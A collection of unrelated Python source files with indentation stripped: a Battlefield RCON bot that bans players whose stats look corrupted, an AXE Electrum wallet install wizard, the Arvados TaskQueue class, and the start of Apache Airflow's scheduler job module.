"4" : f"https://battlelog.battlefield.com/bf4/warsawoverviewpopulate/{personaId}/1/",
"3" : f"https://battlelog.battlefield.com/bf3/overviewPopulateStats/{personaId}/None/1/"
}
url = bflist[re.findall(r"([34])", bf)[0]]
res = session.get(url).json()
if res["data"].get("overviewStats"):
stats = res["data"]["overviewStats"]
try:
for d in stats.values():
if type(d) == int:
if not (-2147483647 < d < 2147483647) or debug:
raise ValueError("Bad person")
except ValueError:
return personaId, False, username
else:
return personaId, True, username
return personaId, True, username
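# The Battlelog search endpoint is assumed to return JSON shaped roughly like
# the following (illustrative only; field names taken from the lookups above):
#     {"data": [{"personaName": "SomePlayer", "personaId": "123456789", ...}, ...]}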
def CheckParams(guid, *args):
if (args[1] == False):
print(f"{args[2]} banned " + str(rcon.Command(f"banList.add guid {guid} perm Crasher({player[2]} {player[0]})")))
f = open("ban.log", "w")
f.write(f"{str(datetime.datetime.now())} | {guid} | {args[0]} | {args[2]}\n")
f.close()
else:
print(f"{args[2]} joined")
def OnJoin(event):
try:
username, guid = event[0], event[1]
personaId, status, username = GetUserInfo(username)
CheckParams(guid, personaId, status, username)
except Exception as ex:
print(str(ex) + " " + str(event))
if __name__ == "__main__":
print("i'm alive")
rcon = RCon((ip,port), password)
rcon.connect()
rcon.events.update({"player.onJoin" : OnJoin})
rcon.StartEventListener()
while True:
pass
|
installwizard.py
|
import os
import sys
import threading
import traceback
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from electrum_axe.wallet import Wallet
from electrum_axe.storage import WalletStorage
from electrum_axe.util import UserCancelled, InvalidPassword
from electrum_axe.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack
from electrum_axe.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import *
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
WIF_HELP_TEXT = (_('WIF keys are typed in Electrum, based on script type.') + '\n\n' +
_('A few examples') + ':\n' +
'p2pkh:XERBBcaPf5D5... \t-> XhGqfhnL...\n')
# note: full key is XERBBcaPf5D5oFXTEP7TdPWLem5ktc2Zr3AhhQhHVQaF49fDP6tN
MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\
+ _("You have multiple consecutive whitespaces or leading/trailing "
"whitespaces in your passphrase.") + " " \
+ _("This is discouraged.") + " " \
+ _("Due to a bug, old versions of Electrum will NOT be creating the "
"same wallet as newer versions or other software.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(4, 4, self.size-8, self.size-8)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 8, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0]
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
except GoBack:
wizard.go_back() if wizard.can_go_back() else wizard.close()
return
except UserCancelled:
return
#if out is None:
# out = ()
if type(out) is not tuple:
out = (out,)
run_next(*out)
return func_wrapper
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
def __init__(self, config, app, plugins, storage):
BaseWizard.__init__(self, config, plugins, storage)
QDialog.__init__(self, None)
self.setWindowTitle('AXE Electrum - ' + _('Install Wizard'))
self.app = app
self.config = config
# Set for the base class
self.language_for_seed = config.get('language')
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon(':icons/electrum-axe.png')
self.show()
self.raise_()
self.refresh_gui() # Needed for Qt on macOS. Lame.
def run_and_get_wallet(self, get_wallet_from_daemon):
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('AXE Electrum wallet'))
wallet_folder = os.path.dirname(self.storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
wallet_from_memory = get_wallet_from_daemon(path)
try:
if wallet_from_memory:
self.storage = wallet_from_memory.storage
else:
self.storage = WalletStorage(path, manual_upgrades=True)
self.next_button.setEnabled(True)
except BaseException:
traceback.print_exc(file=sys.stderr)
self.storage = None
self.next_button.setEnabled(False)
if self.storage:
if not self.storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
pw = False
elif not wallet_from_memory:
if self.storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
pw = True
elif self.storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
pw = False
else:
msg = _("Press 'Next' to open this wallet.")
pw = False
else:
msg = _("This file is already open in memory.") + "\n" \
+ _("Press 'Next' to create/focus window.")
pw = False
else:
msg = _('Cannot read file')
pw = False
self.msg_label.setText(msg)
if pw:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.storage.path)
self.name_e.setText(n)
while True:
if self.loop.exec_() != 2: # 2 = next
return
if self.storage.file_exists() and not self.storage.is_encrypted():
break
if not self.storage.file_exists():
break
wallet_from_memory = get_wallet_from_daemon(self.storage.path)
if wallet_from_memory:
return wallet_from_memory
if self.storage.file_exists() and self.storage.is_encrypted():
if self.storage.is_encrypted_with_user_pw():
password = self.pw_e.text()
try:
self.storage.decrypt(password)
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e))
continue
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
elif self.storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET)
except InvalidPassword as e:
QMessageBox.information(
None, _('Error'),
_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.stack = []
return self.run_and_get_wallet(get_wallet_from_daemon)
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
if self.storage.is_past_initial_decryption():
break
else:
return
else:
raise Exception('Unexpected encryption version')
path = self.storage.path
if self.storage.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since AXE Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = '\n'.join(self.storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
return
action = self.storage.get_action()
if action and action not in ('new', 'upgrade_storage'):
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
if action:
# self.wallet is set in run
self.run(action)
return self.wallet
self.wallet = Wallet(self.storage)
return self.wallet
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(filename).scaledToWidth(60, mode=Qt.SmoothTransformation))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack from None
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
header_layout = QHBoxLayout()
label = WWLabel(message)
label.setMinimumWidth(400)
header_layout.addWidget(label)
if show_wif_help:
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
return self.text_input(title, header_layout, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
playout = PasswordLayout(None, msg, kind, self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(None, MSG_HW_STORAGE_ENCRYPTION, PW_NEW, self.next_button)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self):
self.accept_signal.emit()
def waiting_dialog(self, task, msg, on_finished=None):
label = WWLabel(msg)
vbox = QVBoxLayout()
vbox.addSpacing(100)
label.setMinimumWidth(300)
label.setAlignment(Qt.AlignCenter)
vbox.addWidget(label)
self.set_layout(vbox, next_enabled=False)
self.back_button.setEnabled(False)
t = threading.Thread(target=task)
t.start()
while True:
t.join(1.0/60)
if t.is_alive():
self.refresh_gui()
else:
break
if on_finished:
on_finished()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def choice_and_line_dialog(self, title, message1, choices, message2,
test_text, run_next) -> (str, str):
vbox = QVBoxLayout()
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
c_default_text = [x[2] for x in choices]
def on_choice_click(clayout):
idx = clayout.selected_index()
line.setText(c_default_text[idx])
clayout = ChoicesLayout(message1, c_titles, on_choice_click)
vbox.addLayout(clayout.layout())
vbox.addSpacing(50)
vbox.addWidget(WWLabel(message2))
line = QLineEdit()
def on_text_change(text):
self.next_button.setEnabled(test_text(text))
line.textEdited.connect(on_text_change)
on_choice_click(clayout) # set default text for "line"
vbox.addWidget(line)
self.exec_layout(vbox, title)
choice = c_values[clayout.selected_index()]
return str(line.text()), choice
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=(), warn_issue4566=False):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
if warn_issue4566:
text_whitespace_normalised = ' '.join(text.split())
warn_issue4566_label.setVisible(text != text_whitespace_normalised)
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566)
warn_issue4566_label.setVisible(False)
vbox.addWidget(warn_issue4566_label)
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMinimumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, alignment=Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return line.text()
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False, for_seed_words=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("AXE Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let AXE Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
task_queue.py
|
# Copyright (C) The Arvados Authors. All rights reserved.
#
# SPDX-License-Identifier: Apache-2.0
"""TaskQueue."""
import queue
import threading
from typing import Callable, Optional
from .loghandler import _logger
class TaskQueue:
"""A TaskQueue class.
Uses a first-in, first-out queue of tasks executed on a fixed number of
threads.
New tasks enter the queue and are started in the order received,
as worker threads become available.
If thread_count == 0 then tasks will be synchronously executed
when add() is called (this makes the actual task queue behavior a
no-op, but may be a useful configuration knob).
The thread_count is also used as the maximum size of the queue.
The threads are created during TaskQueue initialization. Call
join() when you're done with the TaskQueue and want the threads to
stop.
"""
in_flight: int = 0
"""The number of tasks in the queue."""
def __init__(self, lock: threading.Lock, thread_count: int):
"""Create a new task queue using the specified lock and number of threads."""
self.thread_count = thread_count
self.task_queue: queue.Queue[Optional[Callable[[], None]]] = queue.Queue(
maxsize=self.thread_count
)
self.task_queue_threads = []
self.lock = lock
self.error: Optional[BaseException] = None
for _r in range(0, self.thread_count):
t = threading.Thread(target=self._task_queue_func)
self.task_queue_threads.append(t)
t.start()
def _task_queue_func(self) -> None:
while True:
task = self.task_queue.get()
if task is None:
return
try:
task()
except BaseException as e:
_logger.exception("Unhandled exception running task")
self.error = e
finally:
with self.lock:
self.in_flight -= 1
def add(
self,
task: Callable[[], None],
unlock: Optional[threading.Condition] = None,
check_done: Optional[threading.Event] = None,
) -> None:
"""
Add your task to the queue.
The optional unlock will be released prior to attempting to add the
task to the queue.
If the optional "check_done" threading.Event's flag is set, then we
will skip adding this task to the queue.
If the TaskQueue was created with thread_count == 0 then your task will
be synchronously executed.
"""
if self.thread_count == 0:
task()
return
with self.lock:
self.in_flight += 1
while True:
try:
if unlock is not None:
unlock.release()
if check_done is not None and check_done.is_set():
with self.lock:
self.in_flight -= 1
return
self.task_queue.put(task, block=True, timeout=3)
return
except queue.Full:
pass
finally:
if unlock is not None:
unlock.acquire()
def drain(self) -> None:
"""Drain the queue."""
try:
while not self.task_queue.empty():
self.task_queue.get(True, 0.1)
except queue.Empty:
pass
def join(self) -> None:
"""Wait for all threads to complete."""
for _t in self.task_queue_threads:
self.task_queue.put(None)
for t in self.task_queue_threads:
t.join()
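# Illustrative usage sketch (not part of the original module): create the queue
# with a shared lock and a thread count, add() callables, then join() once all
# tasks have been submitted; any task exception is surfaced via .error.
def _example_task_queue_usage() -> None:
    lock = threading.Lock()
    tq = TaskQueue(lock, thread_count=2)
    try:
        for i in range(5):
            # the default argument binds the current value of i for each task
            tq.add(lambda i=i: _logger.info("task %d finished", i))
    finally:
        tq.join()  # one stop sentinel per worker thread, then wait for them
    if tq.error is not None:
        raise tq.error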
|
scheduler_job.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import logging
import multiprocessing
import os
import signal
import sys
import threading
import time
from collections import defaultdict
from contextlib import redirect_stderr, redirect_stdout
from datetime import timedelta
from itertools import groupby
from typing import List, Set
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_
from sqlalchemy.orm.session import make_transient
from airflow import models, settings
from airflow.configuration import conf
from airflow.exceptions import AirflowException, TaskNotFound
from airflow.executors.local_executor import LocalExecutor
from airflow.executors.sequential_executor import SequentialExecutor
from airflow.jobs.base_job import BaseJob
from airflow.models import DAG, DagModel, SlaMiss, errors
from airflow.models.dagrun import DagRun
from airflow.models.taskinstance import SimpleTaskInstance, TaskInstanceKeyType
from airflow.stats import Stats
from airflow.ti_deps.dep_context import DepContext
from airflow.ti_deps.dependencies import SCHEDULED_DEPS
from airflow.ti_deps.deps.pool_slots_available_dep import STATES_TO_COUNT_AS_RUNNING
from airflow.utils import asciiart, helpers, timezone
from airflow.utils.dag_processing import (
AbstractDagFileProcessorProcess, DagFileProcessorAgent, SimpleDag, SimpleDagBag,
)
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.session import provide_session
from airflow.utils.state import State
from airflow.utils.types import DagRunType
class DagFileProcessorProcess(AbstractDagFileProcessorProcess, LoggingMixin):
"""Runs DAG processing in a separate process using DagFileProcessor
:param file_path: a Python file containing Airflow DAG definitions
:type file_path: str
:param pickle_dags: whether to serialize the DAG objects to the DB
:type pickle_dags: bool
:param dag_id_white_list: If specified, only look at these DAG ID's
:type dag_id_white_list: List[str]
:param zombies: zombie task instances to kill
:type zombies: List[airflow.models.taskinstance.SimpleTaskInstance]
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(self, file_path, pickle_dags, dag_id_white_list, zombies):
self._file_path = file_path
# The process that was launched to process the given file path.
self._process = None
self._dag_id_white_list = dag_id_white_list
self._pickle_dags = pickle_dags
self._zombies = zombies
# The result of Scheduler.process_file(file_path).
self._result = None
# Whether the process is done running.
self._done = False
# When the process started.
self._start_time = None
# This ID is used to uniquely name the process / thread that's launched
# by this processor instance
self._instance_id = DagFileProcessorProcess.class_creation_counter
self._parent_channel = None
self._result_queue = None
DagFileProcessorProcess.class_creation_counter += 1
@property
def file_path(self):
return self._file_path
@staticmethod
def _run_file_processor(result_channel,
file_path,
pickle_dags,
dag_id_white_list,
thread_name,
zombies):
"""
Process the given file.
:param result_channel: the connection to use for passing back the result
:type result_channel: multiprocessing.Connection
:param file_path: the file to process
:type file_path: str
:param pickle_dags: whether to pickle the DAGs found in the file and
save them to the DB
:type pickle_dags: bool
:param dag_id_white_list: if specified, only examine DAG ID's that are
in this list
:type dag_id_white_list: list[str]
:param thread_name: the name to use for the process that is launched
:type thread_name: str
:param zombies: zombie task instances to kill
:type zombies: list[airflow.models.taskinstance.SimpleTaskInstance]
:return: the process that was launched
:rtype: multiprocessing.Process
"""
# This helper runs in the newly created process
log = logging.getLogger("airflow.processor")
set_context(log, file_path)
setproctitle("airflow scheduler - DagFileProcessor {}".format(file_path))
try:
# redirect stdout/stderr to log
with redirect_stdout(StreamLogWriter(log, logging.INFO)),\
redirect_stderr(StreamLogWriter(log, logging.WARN)):
# Re-configure the ORM engine as there are issues with multiple processes
settings.configure_orm()
# Change the thread name to differentiate log lines. This is
# really a separate process, but changing the name of the
# process doesn't work, so changing the thread name instead.
threading.current_thread().name = thread_name
start_time = time.time()
log.info("Started process (PID=%s) to work on %s", os.getpid(), file_path)
dag_file_processor = DagFileProcessor(dag_ids=dag_id_white_list, log=log)
result = dag_file_processor.process_file(
file_path=file_path,
zombies=zombies,
pickle_dags=pickle_dags
)
result_channel.send(result)
end_time = time.time()
log.info(
"Processing %s took %.3f seconds", file_path, end_time - start_time
)
except Exception: # pylint: disable=broad-except
# Log exceptions through the logging framework.
log.exception("Got an exception! Propagating...")
raise
finally:
result_channel.close()
# We re-initialized the ORM within this Process above so we need to
# tear it down manually here
settings.dispose_orm()
def start(self):
"""
Launch the process and start processing the DAG.
"""
self._parent_channel, _child_channel = multiprocessing.Pipe()
self._process = multiprocessing.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
self.file_path,
self._pickle_dags,
self._dag_id_white_list,
"DagFileProcessor{}".format(self._instance_id),
self._zombies
),
name="DagFileProcessor{}-Process".format(self._instance_id)
)
self._start_time = timezone.utcnow()
self._process.start()
def kill(self):
"""
Kill the process launched to process the file, and ensure consistent state.
"""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
# The queue will likely get corrupted, so remove the reference
self._result_queue = None
self._kill_process()
def terminate(self, sigkill=False):
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
:type sigkill: bool
"""
if self._process is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
self._process.join(5)
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self):
if self._process.is_alive():
self.log.warning("Killing PID %s", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
@property
def pid(self):
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self):
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if not self._done:
raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
@property
def done(self):
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
if self._process is None:
raise AirflowException("Tried to see if it's done before starting!")
if self._done:
return True
if self._parent_channel.poll():
try:
self._result = self._parent_channel.recv()
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
except EOFError:
pass
if not self._process.is_alive():
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
return False
@property
def result(self):
"""
:return: result of running DagFileProcessor.process_file()
:rtype: Tuple[List[airflow.utils.dag_processing.SimpleDag], int]
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self):
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
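# Illustrative sketch (not part of the original module): driving a single
# DagFileProcessorProcess by hand. The file path is hypothetical and a fully
# configured Airflow environment is assumed.
#
#   processor = DagFileProcessorProcess(
#       file_path="/files/dags/example.py",   # hypothetical path
#       pickle_dags=False,
#       dag_id_white_list=[],
#       zombies=[],
#   )
#   processor.start()
#   while not processor.done:
#       time.sleep(0.1)
#   simple_dags, import_error_count = processor.result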
class DagFileProcessor(LoggingMixin):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of SimpleDag objects that represent the DAGs found in
the file
:param dag_ids: If specified, only look at these DAG IDs
:type dag_ids: List[str]
:param log: Logger to use while processing the DAG file
:type log: logging.Logger
"""
UNIT_TEST_MODE = conf.getboolean('core', 'UNIT_TEST_MODE')
def __init__(self, dag_ids, log):
self.dag_ids = dag_ids
self._log = log
@provide_session
def manage_slas(self, dag, session=None):
"""
